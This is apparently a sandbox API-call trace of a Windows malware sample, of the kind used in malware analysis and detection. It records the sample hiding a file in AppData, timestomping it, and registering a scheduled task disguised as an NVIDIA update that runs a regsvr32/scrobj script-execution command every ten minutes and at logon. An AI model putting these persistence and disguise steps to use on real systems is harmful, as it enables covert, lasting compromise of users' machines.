[0157.074] GetSystemDirectoryA (in: lpBuffer=0x47617f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.074] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0157.074] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0157.074] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw", dwFileAttributes=0x6) returned 1 [0157.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jgshctw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x628 [0157.075] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x746f880 | out: lpFileInformation=0x746f880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0157.075] SetFileTime (hFile=0x628, lpCreationTime=0x746f884, lpLastAccessTime=0x746f88c, lpLastWriteTime=0x746f894) returned 1 [0157.075] CloseHandle (hObject=0x628) returned 1 [0157.075] GetProcessHeap () returned 0x210000 [0157.075] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47617f0) returned 1 [0157.076] GetProcessHeap () returned 0x210000 [0157.076] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4697130) returned 1 [0157.076] CoCreateInstance (in: rclsid=0x5561010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x5561000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x746f808 | out: ppv=0x746f808*=0x32bef0) returned 0x0 [0157.076] TaskScheduler:ITaskService:Connect (This=0x32bef0, serverName=0x746f870*(varType=0x0, wReserved1=0x54c, wReserved2=0x0, wReserved3=0x0, varVal1=0x556384f, varVal2=0x4697130), user=0x746f890*(varType=0x0, wReserved1=0x54c, wReserved2=0x0, wReserved3=0x0, varVal1=0x556384f, varVal2=0x4697130), domain=0x746f850*(varType=0x0, wReserved1=0x54c, wReserved2=0x0, wReserved3=0x0, varVal1=0x556384f, varVal2=0x4697130), password=0x746f8d0*(varType=0x0, wReserved1=0x54c, wReserved2=0x0, wReserved3=0x0, varVal1=0x556384f, varVal2=0x4697130)) returned 0x0 [0157.077] TaskScheduler:ITaskService:GetFolder (in: This=0x32bef0, Path="", ppFolder=0x746f828 | out: ppFolder=0x746f828*=0x325510) returned 0x0 [0157.080] ITaskFolder:DeleteTask (This=0x325510, Name="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}", flags=0) returned 0x80070002 [0157.082] TaskScheduler:ITaskService:NewTask (in: This=0x32bef0, flags=0x0, ppDefinition=0x746f920 | out: ppDefinition=0x746f920*=0x32bfd0) returned 0x0 [0157.083] ITaskDefinition:get_RegistrationInfo (in: This=0x32bfd0, ppRegistrationInfo=0x746f830 | out: ppRegistrationInfo=0x746f830*=0x32c090) returned 0x0 [0157.084] IRegistrationInfo:put_Author (This=0x32c090, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0157.084] IUnknown:Release (This=0x32c090) returned 0x1 [0157.084] ITaskDefinition:get_Settings (in: This=0x32bfd0, ppSettings=0x746f810 | out: ppSettings=0x746f810*=0x32c1c0) returned 0x0 [0157.084] ITaskSettings:put_StartWhenAvailable (This=0x32c1c0, StartWhenAvailable=1) returned 0x0 [0157.084] IUnknown:Release (This=0x32c1c0) returned 0x1 [0157.084] ITaskDefinition:get_Triggers (in: This=0x32bfd0, ppTriggers=0x746f818 | out: ppTriggers=0x746f818*=0x32c150) returned 0x0 [0157.084] ITriggerCollection:Create (in: This=0x32c150, Type=1, ppTrigger=0x746f7f8 | out: ppTrigger=0x746f7f8*=0x32c3e0) returned 0x0 [0157.084] IUnknown:QueryInterface (in: This=0x32c3e0, riid=0x5561030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x746f800 | out: ppvObject=0x746f800*=0x32c3e0) returned 0x0 [0157.084] ITrigger:get_Repetition (in: This=0x32c3e0, ppRepeat=0x746f7f0 | out: ppRepeat=0x746f7f0*=0x32c470) returned 0x0 [0157.084] GetProcessHeap () returned 0x210000 [0157.085] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x14) returned 0x464c5a0 [0157.085] IRepetitionPattern:put_Interval (This=0x32c470, Interval="PT10M") returned 0x0 [0157.085] ITrigger:put_Repetition (This=0x32c3e0, Repetition=0x32c470) returned 0x0 [0157.085] IUnknown:Release (This=0x32c470) returned 0x1 [0157.085] GetProcessHeap () returned 0x210000 [0157.085] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x30) returned 0x477dfa0 [0157.085] ITrigger:put_StartBoundary (This=0x32c3e0, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0157.085] IUnknown:Release (This=0x32c3e0) returned 0x2 [0157.085] GetProcessHeap () returned 0x210000 [0157.085] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x477dfa0) returned 1 [0157.085] GetProcessHeap () returned 0x210000 [0157.085] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c5a0) returned 1 [0157.085] IUnknown:Release (This=0x32c3e0) returned 0x1 [0157.085] ITriggerCollection:Create (in: This=0x32c150, Type=9, ppTrigger=0x746f7f8 | out: ppTrigger=0x746f7f8*=0x32c4d0) returned 0x0 [0157.086] IUnknown:QueryInterface (in: This=0x32c4d0, riid=0x5561020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x746f7f0 | out: ppvObject=0x746f7f0*=0x32c4d0) returned 0x0 [0157.086] ILogonTrigger:put_UserId (This=0x32c4d0, UserId="5p5NrGJn0jS HALPmcxz") returned 0x0 [0157.087] IUnknown:Release (This=0x32c4d0) returned 0x2 [0157.088] IUnknown:Release (This=0x32c4d0) returned 0x1 [0157.088] ITaskDefinition:get_Actions (in: This=0x32bfd0, ppActions=0x746f838 | out: ppActions=0x746f838*=0x46df30) returned 0x0 [0157.088] IActionCollection:Create (in: This=0x46df30, Type=0, ppAction=0x746f840 | out: ppAction=0x746f840*=0x32c5c0) returned 0x0 [0157.088] IUnknown:Release (This=0x46df30) returned 0x1 [0157.088] IUnknown:QueryInterface (in: This=0x32c5c0, riid=0x5561040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x746f820 | out: ppvObject=0x746f820*=0x32c5c0) returned 0x0 [0157.088] IExecAction:put_Path (This=0x32c5c0, Path="regsvr32") returned 0x0 [0157.088] IExecAction:put_Arguments (This=0x32c5c0, Arguments="/s /n /u /i:\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw\" scrobj") returned 0x0 [0157.088] IUnknown:Release (This=0x32c5c0) returned 0x2 [0157.088] ITaskFolder:RegisterTaskDefinition (in: This=0x325510, Path="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}", pDefinition=0x32bfd0, flags=6, UserId=0x746f850*(varType=0x0, wReserved1=0x54c, wReserved2=0x0, wReserved3=0x0, varVal1=0x556384f, varVal2=0x4697130), password=0x746f890*(varType=0x0, wReserved1=0x54c, wReserved2=0x0, wReserved3=0x0, varVal1=0x556384f, varVal2=0x4697130), LogonType=3, sddl=0x746f870*(varType=0x0, wReserved1=0x54c, wReserved2=0x0, wReserved3=0x0, varVal1=0x556384f, varVal2=0x4697130), ppTask=0x746f7f0 | out: ppTask=0x746f7f0*=0x32c6c0) returned 0x0 [0157.182] IUnknown:Release (This=0x32c5c0) returned 0x1 [0157.182] IUnknown:Release (This=0x32c150) returned 0x1 [0157.182] TaskScheduler:IUnknown:Release (This=0x32bfd0) returned 0x0 [0157.182] TaskScheduler:IUnknown:Release (This=0x325510) returned 0x0 [0157.182] TaskScheduler:IUnknown:Release (This=0x32bef0) returned 0x0 [0157.182] GetProcessHeap () returned 0x210000 [0157.182] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0157.182] GetProcessHeap () returned 0x210000 [0157.182] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2c326e0) returned 1 [0157.182] GetProcessHeap () returned 0x210000 [0157.182] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47615c0) returned 1 [0157.182] GetProcessHeap () returned 0x210000 [0157.182] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46cda20) returned 1 [0157.182] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x600 [0157.183] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 0x61c [0157.183] GetProcessHeap () returned 0x210000 [0157.183] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x44) returned 0x477b7c0 [0157.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gaejfer"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1021c060 [0157.183] GetProcessHeap () returned 0x210000 [0157.183] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xac) returned 0x468f150 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x103b089a [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4ce1bd2e [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1784d7d [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x15a67c9e [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5c421633 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5bd964ed [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x49e4d7c6 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x658a8cf9 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x510732f8 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xd923b9 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5879eb6f [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1fe69406 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x338688d7 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x67c91065 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x709331f3 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4ce1bd2e [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1c93b2ac [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x30dd9c5e [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x608a609e [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x3f23c0d8 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x75f6c241 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xd40f5ba [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x44336154 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x50b62c05 [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x498b767e [0157.183] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x55e411a3 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x17b0bfb4 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x658a8cf9 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7558bd81 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4d707734 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5fecb607 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x446fd504 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x66b5bc2a [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xd6024a4 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1aac1435 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x23d908f4 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x679665ca [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x12cb340f [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4ab4a74d [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xab6e70d [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1e189211 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7bb2a407 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x55ecd903 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4de8d3cd [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x238228ab [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xedc4485 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x434f61d9 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7eaf11c7 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x44aa7f3f [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x53bee7d6 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x60401f68 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x31f603a7 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x57abbb0a [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x286056eb [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x58723b66 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x41c99753 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7a8ed7db [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x67c91065 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x571d8418 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x3fc2aca1 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x13fe87e0 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x44aa7f3f [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x55928518 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4738c4c1 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x79da2d23 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x43a41d71 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x513f5cf5 [0157.184] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x32628061 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x49a8ceaf [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x346327d2 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x19f89c29 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x39e0c2af [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5431aadd [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x446b1e78 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x17929489 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x22864a45 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x32628061 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x27f3b030 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x510732f8 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x116eb8ae [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x57b18e1e [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x78fa44dd [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x45a49f6a [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1fc0ba91 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x432389ae [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x9f3757a [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x2c58482 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7cb7e2d1 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x3e75edc8 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x2c8504de [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5fdd089a [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x427564e2 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x46370385 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x21657b1d [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x58bb15bb [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5a11b4f [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4738c4c1 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xe1178a0 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x454f3bf6 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x49bcfd8a [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x798006ce [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1820b27d [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x725b2837 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x53537eb9 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4b342daa [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1434c678 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x4ec6bc75 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x585a2d64 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xe179e11 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x694015fb [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x49e4d7c6 [0157.185] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x35a7021 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x2459c6d4 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x42d87891 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x213f5f6a [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x2e191169 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x30dd9c5e [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x3b120d00 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x22f172e8 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x2c030d4c [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x59e229af [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7abd5e96 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x238228ab [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5176daaf [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5221776b [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x310fa74d [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x446fd504 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x13649d7c [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7dcd04df [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x20d476b1 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7d9d6fa7 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x518b5e22 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7f192a2c [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x18ee9442 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x3b01a856 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x18ee9442 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1968a970 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x3847e803 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7a4b3ca4 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x55680d38 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x17cfc1ec [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x1a6cca46 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x39a59a32 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x77ac8b06 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x2f224ce8 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x377a2f76 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x547819ef [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xf3d6c3a [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x106b0121 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x71b004d6 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x778e32a [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x844b865 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x3f4c3c4f [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x376cd781 [0157.186] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xb05eb6f [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x15de3947 [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x6dae63ad [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x61243d5d [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x5ea5a821 [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x7e022a27 [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0xce0b5b2 [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x268fbb1c [0157.187] RtlRandomEx (in: Seed=0x54c0e86 | out: Seed=0x54c0e86) returned 0x423cc65b [0157.187] GetProcessHeap () returned 0x210000 [0157.187] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xeb) returned 0x2e8cb0 [0157.187] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") 